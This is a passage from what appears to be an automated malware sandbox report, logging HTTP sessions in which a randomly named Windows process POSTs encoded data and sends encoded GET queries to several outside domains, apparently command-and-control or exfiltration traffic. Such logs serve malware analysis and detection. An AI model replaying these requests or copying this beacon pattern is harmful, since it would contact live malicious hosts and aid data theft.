                                                                  21 | 192.168.2.4 | 50023 | 170.33.13.246 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:33.795064926 CET | 710 | OUT | POST /3oq9/ HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.opro.vip
                                                                  Referer: http://www.opro.vip/3oq9/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 66 34 66 38 30 6b 7a 42 6d 6b 33 58 51 6b 2b 75 62 2b 55 34 48 71 4a 2f 4b 79 64 6e 63 70 46 6b 4e 6d 34 49 74 55 37 42 50 52 75 51 69 45 51 31 76 4c 6c 79 61 74 72 35 48 59 76 36 51 68 43 63 6d 71 4e 67 54 65 4f 56 68 36 55 45 6f 42 38 6c 2f 78 6f 39 4d 4f 2f 47 44 54 65 42 6d 49 7a 6a 6b 5a 30 62 53 4b 54 2f 79 7a 41 4a 70 67 65 61 76 78 4a 59 6a 37 4d 65 63 34 32 33 42 38 61 34 47 34 31 6c 38 64 30 32 71 39 63 39 4e 51 63 43 70 68 73 76 61 31 4a 37 56 4e 4c 50 78 6a 78 50 6f 4b 66 37 69 57 74 50 5a 54 6a 71 69 30 30 70 75 77 36 69 4f 77 3d 3d
                                                                  Data Ascii: 3h=7OhtZpOFOJnuf4f80kzBmk3XQk+ub+U4HqJ/KydncpFkNm4ItU7BPRuQiEQ1vLlyatr5HYv6QhCcmqNgTeOVh6UEoB8l/xo9MO/GDTeBmIzjkZ0bSKT/yzAJpgeavxJYj7Mec423B8a4G41l8d02q9c9NQcCphsva1J7VNLPxjxPoKf7iWtPZTjqi00puw6iOw==
                                                                  Jan 10, 2025 18:52:34.654228926 CET | 150 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:34 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ed07-1a3"
                                                                  Jan 10, 2025 18:52:34.654453993 CET | 419 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  22 | 192.168.2.4 | 50024 | 170.33.13.246 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:36.339319944 CET | 730 | OUT | POST /3oq9/ HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.opro.vip
                                                                  Referer: http://www.opro.vip/3oq9/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 63 5a 76 38 32 44 6e 42 68 45 33 55 4a 45 2b 75 53 65 55 38 48 71 46 2f 4b 7a 5a 33 63 66 74 6b 49 33 49 49 73 51 58 42 49 52 75 51 73 6b 51 77 72 4c 6c 39 61 74 75 4f 48 64 50 36 51 6c 69 63 6d 72 64 67 54 74 6d 55 75 4b 55 38 78 52 38 6a 37 78 6f 39 4d 4f 2f 47 44 54 36 72 6d 49 72 6a 6b 4a 6b 62 54 75 50 34 38 54 41 4f 75 67 65 61 72 78 4a 63 6a 37 4e 37 63 36 53 4a 42 36 65 34 47 38 78 6c 38 49 55 78 7a 4e 63 2f 53 67 64 41 70 79 31 44 55 46 51 71 4c 61 33 4f 2b 58 41 33 6b 73 53 68 7a 6e 4d 59 4c 54 48 5a 2f 7a 39 64 6a 7a 48 72 56 2b 66 36 6f 47 32 4f 2b 45 44 55 4f 61 78 75 2f 50 4e 61 37 77 67 3d
                                                                  Data Ascii: 3h=7OhtZpOFOJnucZv82DnBhE3UJE+uSeU8HqF/KzZ3cftkI3IIsQXBIRuQskQwrLl9atuOHdP6QlicmrdgTtmUuKU8xR8j7xo9MO/GDT6rmIrjkJkbTuP48TAOugearxJcj7N7c6SJB6e4G8xl8IUxzNc/SgdApy1DUFQqLa3O+XA3ksShznMYLTHZ/z9djzHrV+f6oG2O+EDUOaxu/PNa7wg=
                                                                  Jan 10, 2025 18:52:37.262958050 CET | 150 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ed07-1a3"
                                                                  Jan 10, 2025 18:52:37.266720057 CET | 419 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  23 | 192.168.2.4 | 50025 | 170.33.13.246 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:38.887358904 CET | 10812 | OUT | POST /3oq9/ HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.opro.vip
                                                                  Referer: http://www.opro.vip/3oq9/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 37 4f 68 74 5a 70 4f 46 4f 4a 6e 75 63 5a 76 38 32 44 6e 42 68 45 33 55 4a 45 2b 75 53 65 55 38 48 71 46 2f 4b 7a 5a 33 63 66 56 6b 49 6c 41 49 74 33 44 42 4a 52 75 51 6b 45 51 78 72 4c 6c 61 61 70 43 4b 48 64 4c 45 51 6e 61 63 6e 4a 46 67 52 63 6d 55 31 61 55 38 73 42 38 6d 2f 78 70 67 4d 4e 58 43 44 54 71 72 6d 49 72 6a 6b 50 49 62 54 36 54 34 73 6a 41 4a 70 67 65 47 76 78 4a 30 6a 37 6b 47 63 36 47 5a 42 4c 69 34 47 63 68 6c 36 38 30 78 73 39 63 35 54 67 64 69 70 79 4a 63 55 46 4d 6d 4c 66 69 72 2b 51 77 33 31 39 72 42 32 55 67 6b 50 53 76 45 6d 55 64 61 37 43 54 38 56 63 32 48 75 58 6a 56 71 56 48 52 45 61 63 77 6a 76 70 50 74 67 48 74 77 58 78 62 6a 69 71 35 62 37 75 51 76 69 54 70 46 76 5a 32 63 59 77 4c 53 79 54 46 41 36 4d 4d 79 6c 4e 6e 46 65 4c 68 6f 49 7a 4d 43 5a 47 6f 6b 63 65 42 68 71 55 7a 43 34 6d 4c 4f 41 46 33 68 6d 47 52 46 74 2f 61 6d 54 53 35 65 63 36 4c 46 73 46 74 51 6f 78 4e 52 6a 49 58 50 61 56 57 5a 73 73 67 6b 4f 54 46 54 38 51 63 47 54 77 43 4c 75 6c 64 31 2b 62 [TRUNCATED]
                                                                  Data Ascii: 3h= [TRUNCATED]
                                                                  Jan 10, 2025 18:52:39.931550026 CET | 150 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:39 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ecf7-1a3"
                                                                  Jan 10, 2025 18:52:39.932400942 CET | 419 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  24 | 192.168.2.4 | 50026 | 170.33.13.246 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:41.428215027 CET | 454 | OUT | GET /3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:42.296263933 CET | 150 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:42 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ed07-1a3"
                                                                  Jan 10, 2025 18:52:42.297291994 CET | 419 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  25 | 192.168.2.4 | 50027 | 66.235.200.145 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:47.362998962 CET | 722 | OUT | POST /v9ah/ HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.santillo.bet
                                                                  Referer: http://www.santillo.bet/v9ah/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 41 66 37 55 53 71 56 66 4a 4f 38 59 7a 52 67 58 4c 47 6e 4f 62 76 59 52 70 76 5a 37 4a 4b 48 54 39 67 65 78 6d 42 32 4a 6c 39 57 73 73 53 35 73 6d 46 76 31 76 41 6c 41 50 43 47 72 51 57 59 75 52 7a 48 76 53 58 78 71 58 50 44 4c 58 50 76 6a 6e 7a 33 73 57 61 4b 49 62 61 70 41 73 7a 56 4b 57 75 4e 5a 69 72 67 30 74 55 32 72 36 69 65 73 51 6c 74 4e 36 64 44 61 57 6b 69 41 71 49 7a 58 66 46 75 6b 4d 69 71 6a 68 41 71 43 38 58 61 32 56 7a 31 2b 75 78 62 67 51 69 59 33 37 54 35 66 34 44 34 43 47 65 31 62 61 31 67 4e 2f 39 75 53 66 44 4b 64 78 6d 76 73 49 68 57 59 6b 49 4d 76 67 3d 3d
                                                                  Data Ascii: 3h=/Af7USqVfJO8YzRgXLGnObvYRpvZ7JKHT9gexmB2Jl9WssS5smFv1vAlAPCGrQWYuRzHvSXxqXPDLXPvjnz3sWaKIbapAszVKWuNZirg0tU2r6iesQltN6dDaWkiAqIzXfFukMiqjhAqC8Xa2Vz1+uxbgQiY37T5f4D4CGe1ba1gN/9uSfDKdxmvsIhWYkIMvg==
                                                                  Jan 10, 2025 18:52:48.100738049 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Link: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Vary: Accept-Encoding
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Set-Cookie: __cf_bm=kPF5WOIbv289WV_8Iv3X8SkQUHdrTl1cyi.LnhZ19NE-1736531568-1.0.1.1-wLlpJPI2CpHKNBGn5BQnfRjo_e0COCMx6BtjRy_5UCTxce2zSGIWMDIdXP3vj2Nef.CJBuhWdBE6r3OyGWawFg; path=/; expires=Fri, 10-Jan-25 18:22:48 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=tjDDRZqDWqo8a54c.rcLDL7Wr_6tCMYR8nvg3i_x0.Y-1736531568058-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe85dadf137c9f-EWR
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 37 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55
                                                                  Data Ascii: 719Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                                                                  Jan 10, 2025 18:52:48.100764036 CET | 1236 | IN | Data Raw: 53 c3 52 0e 7d 05 b4 d3 a8 95 ac 41 99 fb 18 cb 62 a1 99 81 a5 75 d5 5b dc 8f 1e 11 84 9f 51 75 69 79 46 ed 59 9d fb ba af f2 4f ca ec 13 15 19 3c a7 d1 28 de 53 b0 d1 2e c2 f0 25 ae 0e 67 ee f3 7f 3e 82 32 20 20 03 44 d1 85 b5 43 0b 89 3e 7c 90
                                                                  Data Ascii: SR}Abu[QuiyFYO<(S.%g>2 DC>|)#RDrEOHqK-@"[p>osbHiiODxWqUgA]m9LIeDFdZO!5o&tX2rI0:tLkPx~6rF|ba}J*gEdk
                                                                  Jan 10, 2025 18:52:48.100775003 CET | 365 | IN | Data Raw: 6b 7b 8c 1c 43 eb e2 ed 26 6d c8 dd 73 1b aa 2b 81 af 14 23 d3 4b 4f 2a 7c 4d 6f 75 e7 cf ea fd ff 0f 47 68 6b 3f 19 8d 5c f7 ef 6e 93 03 9c 6e 97 b1 03 73 bb 8b 64 70 e9 72 99 7d f2 f7 eb d8 f3 23 df 4d 9e b8 d2 96 5a 7d c9 01 f2 2b 06 6e ac b2
                                                                  Data Ascii: k{C&ms+#KO*|MouGhk?\nnsdpr}#MZ}+ngJcV%o* rzuqh>T}1&gMMKd@}rqIpL'`7RBQC?ym=!r7YNn5;(Nk;/nr)(FeZEOA


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  26 | 192.168.2.4 | 50028 | 66.235.200.145 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:49.967571020 CET | 742 | OUT | POST /v9ah/ HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.santillo.bet
                                                                  Referer: http://www.santillo.bet/v9ah/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:50.700732946 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Link: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Vary: Accept-Encoding
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Set-Cookie: __cf_bm=K9cchmZV9L18Uz6a40P9HjSoChJpH5MWTf4TC497znU-1736531570-1.0.1.1-O5SA7sTayuFHs7fbBoOpzkbVABEGnUx8QxtUnL4Hl..FnNys9qNxhNGtYwy2y1ryE4u9XGocNs00nJVxtB2hSg; path=/; expires=Fri, 10-Jan-25 18:22:50 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=C1.elr4RXk_GoQvjY3xrxDTseg2.UvfbIPX.0JDABbc-1736531570654-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe85eb683f18b8-EWR
                                                                  Content-Encoding: gzip


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  27 | 192.168.2.4 | 50029 | 66.235.200.145 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:52.512552023 CET | 10824 | OUT | POST /v9ah/ HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.santillo.bet
                                                                  Referer: http://www.santillo.bet/v9ah/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:53.207634926 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Link: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Vary: Accept-Encoding
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Set-Cookie: __cf_bm=xk_ltVpSlwlZZ42q52B_m0jLl79P5naSHaqtn3N3vZ0-1736531573-1.0.1.1-Ucb5Xtle.3ZPXmsaP5eeiH6A.49KjLMSuYFFFLdGwRSPT85BDN5_UctJvqWS7yQtPY96f2ZXUU41UZd.mxCADg; path=/; expires=Fri, 10-Jan-25 18:22:53 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=Vp8sHZlvK9FHbdMB1Zxd3QFVCFX0UcpB949mCxG3hOQ-1736531573139-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe85fb1a98efa1-EWR
                                                                  Content-Encoding: gzip


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.4 | 50030 | 66.235.200.145 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:52:55.052181005 CET | 458 | OUT | GET /v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:55.759372950 CET | 1094 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Date: Fri, 10 Jan 2025 17:52:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Location: http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: MISS
                                                                  Set-Cookie: __cf_bm=WzeOmupQenHMcU7yCE9zyKRB8uSQkiEZUUH40Vp8_9s-1736531575-1.0.1.1-QGBQfRYm0xkvTS5A0os3ReHGkDLNCQEuFZvNK6.Kco1zMtUWBMmRmQTBX7WUk9CHhKf2RCn7r8DdAirUbnrBVg; path=/; expires=Fri, 10-Jan-25 18:22:55 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=1iYqvkid4qSPtQJb77tW07le0BZRSgeSrIUXNFn6Ngs-1736531575702-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe860b1faf4263-EWR
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  29 | 192.168.2.4 | 50031 | 85.159.66.93 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:53:01.192965984 CET | 728 | OUT | POST /xmwd/ HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.esnafus.online
                                                                  Referer: http://www.esnafus.online/xmwd/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  30 | 192.168.2.4 | 50032 | 85.159.66.93 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:53:03.855757952 CET | 748 | OUT | POST /xmwd/ HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.esnafus.online
                                                                  Referer: http://www.esnafus.online/xmwd/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
